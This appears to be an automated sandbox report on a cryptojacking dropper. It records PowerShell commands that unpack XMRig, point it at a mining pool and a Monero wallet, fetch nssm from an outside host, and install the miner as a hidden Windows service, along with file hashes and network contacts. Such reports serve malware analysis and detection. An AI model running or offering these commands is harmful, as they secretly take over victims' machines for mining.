C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"94.130.12.27:3333\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"438ss2gYTKze7kMqrgUagwEjtm993CVHk1uKHUBZGy6yPaZ2WNe5vdDFXGoVvtf7wcbiAUJix3NR9Ph1aq2NqSgyBkVFEtZ\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"WinTendo\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/nssm.zip' -OutFile 'C:\Users\Admin\nssm.zip'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
C:\Windows\system32\sc.exe
sc stop moneroocean_miner
C:\Windows\system32\sc.exe
sc delete moneroocean_miner
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe"
C:\Windows\system32\timeout.exe
timeout 99999
Network
| Country | Destination | Domain | Proto |
| DE | 85.214.149.236:443 | 85.214.149.236 | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
| DE | 85.214.149.236:443 | 85.214.149.236 | tcp |
Files
memory/3800-118-0x0000000000000000-mapping.dmp
memory/3956-119-0x0000000000000000-mapping.dmp
memory/3024-120-0x0000000000000000-mapping.dmp
memory/3436-121-0x0000000000000000-mapping.dmp
memory/1868-122-0x0000000000000000-mapping.dmp
memory/500-123-0x0000000000000000-mapping.dmp
memory/1168-124-0x0000000000000000-mapping.dmp
memory/416-125-0x0000000000000000-mapping.dmp
memory/2032-126-0x0000000000000000-mapping.dmp
memory/2328-127-0x0000000000000000-mapping.dmp
memory/2968-128-0x0000000000000000-mapping.dmp
memory/3460-129-0x0000000000000000-mapping.dmp
memory/3540-130-0x0000000000000000-mapping.dmp
memory/3540-131-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-132-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-133-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-134-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-135-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-136-0x000001B088F60000-0x000001B088F61000-memory.dmp
memory/3540-137-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-138-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-139-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-140-0x000001B0A15E0000-0x000001B0A15E1000-memory.dmp
memory/3540-141-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-145-0x000001B0A16A0000-0x000001B0A16A2000-memory.dmp
memory/3540-146-0x000001B0A16A3000-0x000001B0A16A5000-memory.dmp
memory/3540-149-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3540-150-0x000001B0A16A6000-0x000001B0A16A8000-memory.dmp
memory/3540-151-0x000001B0874C0000-0x000001B0874C2000-memory.dmp
memory/3208-152-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 42d4b1d78e6e092af15c7aef34e5cf45 |
| SHA1 | 6cf9d0e674430680f67260194d3185667a2bb77b |
| SHA256 | c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0 |
| SHA512 | d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930 |
memory/3208-154-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-155-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-156-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-157-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-158-0x000001D86E280000-0x000001D86E282000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4dd2e0b5c77bf985e686e07151ce43a1 |
| SHA1 | 2a42b3bf86a3938f83c59e31cfba914da12a4d41 |
| SHA256 | 0d4897422bc98a3c7a68e8a1cd657000a0b05a80db77097de1b2c3245ceafc7a |
| SHA512 | febe1df7cc323ecd7ca1e53abfc3f51131aece0fc49085e198165733133edb9c2510b6f1e5e0181e1eb92dd70e6b43f2fa88ef0ac0ade4464cc4031fe7696ade |
memory/3208-161-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-162-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-163-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-164-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-166-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/3208-182-0x000001D8701B0000-0x000001D8701B1000-memory.dmp
memory/3208-183-0x000001D870210000-0x000001D870211000-memory.dmp
C:\Users\Admin\xmrig.zip
| MD5 | 877492e0bf1e064eef97339fd71990fd |
| SHA1 | 3f4988a2b1ca38850b8798974f01cd76815af684 |
| SHA256 | 17862610ea8190e3ed4d22099d324d9058b15c941ce97236405fc80d3c50d747 |
| SHA512 | 016fec4d0c9c9ad4ec6de82456bc41b1c59cfcf8c13781ce457b939f44a21b91c68decf02c05f39d4646e4480734b592c3c6753750b21836b231ab87e70f973d |
memory/3208-186-0x000001D870293000-0x000001D870295000-memory.dmp
memory/3208-184-0x000001D870290000-0x000001D870292000-memory.dmp
memory/3208-187-0x000001D86E280000-0x000001D86E282000-memory.dmp
memory/1436-188-0x0000000000000000-mapping.dmp
memory/1436-189-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-190-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-191-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-192-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-193-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fbc13122e84a66242a4f0fabcd5cf9d5 |
| SHA1 | 498523ee15b697808a1d425d0f1c0e6b1d2cc22b |
| SHA256 | 46bc755334c54a648e0363cd01ced9fe3c68793e6845ae4bf7880c96e2c4f727 |
| SHA512 | 4fe9dffa6b4cf4ffcc86e737d8d6f8d585b48bcaeb03fb0daf5b9234447054009dcdd236ae44afa6604689501e3666da35e8f267ec3f6a85eef30b4ad524684b |
memory/1436-196-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-198-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-197-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-199-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/1436-201-0x000001302F5D0000-0x000001302F5D2000-memory.dmp
memory/3208-204-0x000001D870296000-0x000001D870298000-memory.dmp
memory/1436-206-0x00000130311B0000-0x00000130311B2000-memory.dmp
memory/1436-207-0x00000130311B3000-0x00000130311B5000-memory.dmp
C:\Users\Admin\moneroocean\config.json
| MD5 | bfa626e053028f9adbfaceb5d56086c3 |
| SHA1 | acf9d3be3211c8f96b823517ea83888982d498d3 |
| SHA256 | c17e1a22b7bc00e591aede9d101b843ff2e47d5b582bb0628406bbd53b7dac78 |
| SHA512 | 692115d964b98f380c0f45a9e25dc3d22bc53447c1aa76732103e7ac1807459c45348d873dcb0eeb92ca38f9a954f27078a8f4a3508ca5b4b3809a92f02765d0 |
memory/2780-214-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
memory/1436-218-0x00000130311B6000-0x00000130311B8000-memory.dmp
memory/3064-219-0x0000000000000000-mapping.dmp
memory/3500-220-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a23c5e5e705de0f30711748e5b021e3a |
| SHA1 | 146daa5ef1d5bfc0ebfdcf4537221003a832ddec |
| SHA256 | 6bdddbb0686a9a4cc948e1290c586eb9ca08d1598f954520281eea544ec20125 |
| SHA512 | 356545f153b2f828a046f499d2dd9809f2e1528e503c708ae4ade623b80c4f3a188a777e1019b6f591d4977330fe63d8d733eae78e896d0760593d6192880d9f |
memory/3164-233-0x0000000000000000-mapping.dmp
memory/3040-235-0x0000000000000000-mapping.dmp
memory/3500-236-0x0000020BC4250000-0x0000020BC4252000-memory.dmp
memory/3500-238-0x0000020BC4253000-0x0000020BC4255000-memory.dmp
memory/3500-240-0x0000020BC4256000-0x0000020BC4258000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cea649ddfaf4c9d0fc78102f3208ff5a |
| SHA1 | 6f87f94f33d44019a882f5caf6a69d1e28e9fc03 |
| SHA256 | 7f85db2ec7f2aa30ba605ee3178e24e4c603174671b909bc4ef2cfca22af3328 |
| SHA512 | 6b4eb7cb9ec616d21d5656639786cf3d67785c24b02725c8c8b6e11a032d5a38e5ca01e9ed06bd83a6289937f1cee9228019a513b205daf4fc168c6bb7667dd3 |
C:\Users\Admin\moneroocean\config.json
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3924-261-0x0000000000000000-mapping.dmp
memory/3040-262-0x0000026A70F60000-0x0000026A70F62000-memory.dmp
memory/3040-264-0x0000026A70F63000-0x0000026A70F65000-memory.dmp
memory/3040-266-0x0000026A70F66000-0x0000026A70F68000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7aae732886160c0ea69ed4b1f7d82231 |
| SHA1 | 9c289c7bf92d46ff6393da7463d15f02de2415b6 |
| SHA256 | 67cc09d839ff76aae15e2754f40dc0a2170812877d2e138b40c9af92f2db46f8 |
| SHA512 | 8544786850eaf1e390599ebaff23208d6df5e4cd2e32290e508b66cbfea9eb2f6dffa6a049a3e0666d47a17801484bc58a57eba4002e1fd2b0bb6c997f0ea75a |
C:\Users\Admin\moneroocean\config.json
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1012-288-0x0000000000000000-mapping.dmp
memory/3924-289-0x00000296F5120000-0x00000296F5122000-memory.dmp
memory/3924-291-0x00000296F5123000-0x00000296F5125000-memory.dmp
memory/3924-293-0x00000296F5126000-0x00000296F5128000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fab18070fd50d74b120dd23c7380730d |
| SHA1 | 1cb5b806851000947fd827b5a1ef2b5f66fc4b6d |
| SHA256 | d072fb7c437b427761a63930fa72788e33e28f02bd69637d724036594f05782e |
| SHA512 | a7795a2efc157457d239c775d73a7d1750433029d37f73d07468f341af8eab72f105e1ec8b5e0131c51f905d677fa5a17840f57d523e2f09b752dcdb0c53a719 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 115d22c264f7912e7d02307386db8c53 |
| SHA1 | fe96e575df30c6c3b4f1c3a331d6641f7061726e |
| SHA256 | 38b5c830e728ac133ac5f8153f48f0e90c74dfdbde73426de2331dde69300c9a |
| SHA512 | 0390fd713b7a413eff753f9ab5e3779cf3c0a59b0dbd701e58bae5be222c3ae846dc0605c4802a1851e1e3f371c0baf28560b5bbf98a4131857ee1e0fb864bd8 |
memory/1012-314-0x000002274F1C0000-0x000002274F1C2000-memory.dmp
memory/1012-315-0x000002274F1C3000-0x000002274F1C5000-memory.dmp
memory/1012-316-0x000002274F1C6000-0x000002274F1C8000-memory.dmp
memory/1600-317-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0f07fdc2bb6d46548cc4fa428192640d |
| SHA1 | 968eb2eb678e3662dff687b18c3adba9cbfbfc28 |
| SHA256 | b9e4393b418339bee03585c1138cac1807b56ec7f1add46db438d90f8f210230 |
| SHA512 | 971a83e65520e67b0b6cc2d580e759e62c385eae9b9784ef35a888a9e46264fa1c6b1675f9413d79e0d0ecde4727ff22fc54c5a5f92d8873a12bbf32c23d940d |
C:\Users\Admin\moneroocean\config.json
| MD5 | c35b704c05e2018ce71f35b4be6d687b |
| SHA1 | 7771d19d56d23d3d6f38df5c33a2f162c2b07493 |
| SHA256 | 53b163495576feeb58a418e067016223e9bcfaec0e3e2b0a7d6636c5c23b51d7 |
| SHA512 | 7ecfb37d3bf84959b923f9123053456db74016afc36ce29a6a55b5a6e6fe1d6abeff71724d61b1a499f97842fd711c6e2eaa3e7b885541fd3233aff2d2a24191 |
memory/1200-340-0x0000000000000000-mapping.dmp
memory/1600-341-0x000001691A610000-0x000001691A612000-memory.dmp
memory/1600-343-0x000001691A613000-0x000001691A615000-memory.dmp
memory/1600-345-0x000001691A616000-0x000001691A618000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c98fef9a6f6107dc9314bb5d72716701 |
| SHA1 | 8c2e869aa1b421c639c3b13e34da61b7eecdd897 |
| SHA256 | 17e0f565f69c35453e8a45e4eaae8ea0f16f33839430f85aca5be9512fb12388 |
| SHA512 | ee5321f06e34022d3d66c954c46c7bef13788fe4dce4fab029579eda74a8db9777552b274abed3f3a4dab20e1dc2243bb8cb51c3af3d6c320f614ffbc3e4b993 |
C:\Users\Admin\moneroocean\config.json
| MD5 | bc60290fa5050425ae4a655f493802aa |
| SHA1 | 42df7d9c1e95a7e86c4652b7688d5ea5f03e2c47 |
| SHA256 | 6d2d16f7f250d2db6686c1db275145944cfefef2bdee67bb263f815e10ca3409 |
| SHA512 | 6eda5175e9dc409ee2ae09a5050d08cb910395ecbb81262fdfcc42adcdb078febabf40b4dab679d003aaf625f1645f616c56e4926d6ff331f797f5c368bab5f7 |
C:\Users\Admin\moneroocean\config.json
| MD5 | 05193fd0a7804c0389d4043816400804 |
| SHA1 | 9dfab5b729c059a690169de942919137643162ff |
| SHA256 | 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52 |
| SHA512 | cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997 |
memory/1424-367-0x0000000000000000-mapping.dmp
memory/1200-374-0x000001D3C5240000-0x000001D3C5242000-memory.dmp
memory/1200-375-0x000001D3C5243000-0x000001D3C5245000-memory.dmp
memory/1200-376-0x000001D3C5246000-0x000001D3C5248000-memory.dmp
memory/1424-377-0x000002717F050000-0x000002717F052000-memory.dmp
memory/1424-378-0x000002717F053000-0x000002717F055000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a83091216bc095616faaab798d468f77 |
| SHA1 | f6d1077e144e63da993aa76bbb7ba39c21c89a15 |
| SHA256 | f419c7896156c00eba685f53337be6a97c9c24d7a0de3d359302f75d4651ccde |
| SHA512 | 0488ed46d7276a89bd177c831c5ae63f57983ec7819042c91ba7a328d3f55aea93510a5fa91b1e200e251b6e9bd5d644a4c15faaf9bd89e2f93a29d70c336701 |
C:\Users\Admin\moneroocean\config_background.json
| MD5 | 8b89a341da7415528c151ae4ab3d851c |
| SHA1 | 2b28ff8a983351ab6c73c61bb6e96135fb9368d2 |
| SHA256 | c5cbb3a890dd0ac355a4b2928d7dfc0448b53800682401457b1144b77d5339f0 |
| SHA512 | 1319cd72fbc51c80a5df03ed7f67f737b1acf59eaae195cde72e5d7d33f93c044c65800467e8e10021ab1881df0e22d6d2ca9661fa51f536d09f8f943d6c96e5 |
memory/4016-395-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e53cd020c70375d710ffbf0044fa2067 |
| SHA1 | 778d68ffb59c06ddeb792b45de3e46762665e136 |
| SHA256 | 6f3b6badefd83943a29aadee6281b94771dd3c71e7884f71fafceba4843c0fd0 |
| SHA512 | f272ecd68a6417a22df2fd1c96a5a6a62ae96ae2a45e5bbe0ab890573c7b50bc699b2907a6d8a1ec2c012a793805b4beeb72a93865fb146f32948e5da49cbb1e |
memory/1424-407-0x000002717F056000-0x000002717F058000-memory.dmp
memory/4016-409-0x0000020744780000-0x0000020744782000-memory.dmp
memory/4016-410-0x0000020744783000-0x0000020744785000-memory.dmp
memory/1272-419-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 450adf71e232244110fe8c26e0e58dc6 |
| SHA1 | b668392ed522f7486c91b1c1ad02c35f357dda58 |
| SHA256 | 82447cb406c40e61e2ba971005d5c95836e668bd3bb774ba6f3fc217037e53e3 |
| SHA512 | 2775b438a597684349e09d1abc7f0131491f486b0ec6b7ce5dfd8051672f87a280f12d92b561b84d9dedf14618eedf07febd67123477759ee7a12f024b88c0a8 |
memory/1272-428-0x0000025A75320000-0x0000025A75322000-memory.dmp
memory/1272-429-0x0000025A75323000-0x0000025A75325000-memory.dmp
memory/4016-426-0x0000020744786000-0x0000020744788000-memory.dmp
C:\Users\Admin\nssm.zip
| MD5 | 7ad31e7d91cc3e805dbc8f0615f713c1 |
| SHA1 | 9f3801749a0a68ca733f5250a994dea23271d5c3 |
| SHA256 | 5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201 |
| SHA512 | d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260 |
memory/2936-455-0x0000000000000000-mapping.dmp
memory/2968-456-0x0000000000000000-mapping.dmp
memory/1532-457-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/2884-460-0x0000000000000000-mapping.dmp
memory/1272-462-0x0000025A75326000-0x0000025A75328000-memory.dmp
memory/712-463-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/3380-465-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/736-467-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/1512-469-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
C:\Users\Admin\moneroocean\nssm.exe
| MD5 | 1136efb1a46d1f2d508162387f30dc4d |
| SHA1 | f280858dcfefabc1a9a006a57f6b266a5d1fde8e |
| SHA256 | eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848 |
| SHA512 | 43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5 |
memory/2576-472-0x0000000000000000-mapping.dmp
C:\Users\Admin\moneroocean\xmrig.exe
| MD5 | 90ba713a657fe704ca05fbcfd967c245 |
| SHA1 | 020c59739d08b12008554ec48af07ec35d12f178 |
| SHA256 | 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847 |
| SHA512 | 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3 |
memory/2576-475-0x00000000001A0000-0x00000000001A4000-memory.dmp
memory/2436-476-0x0000000000000000-mapping.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2021-10-29 19:08
Reported
2021-10-29 20:00
Platform
win7-en-20211014
Max time kernel
120s
Max time network
150s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 372 wrote to memory of 532 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
| PID 372 wrote to memory of 532 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
| PID 372 wrote to memory of 532 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\start.cmd"
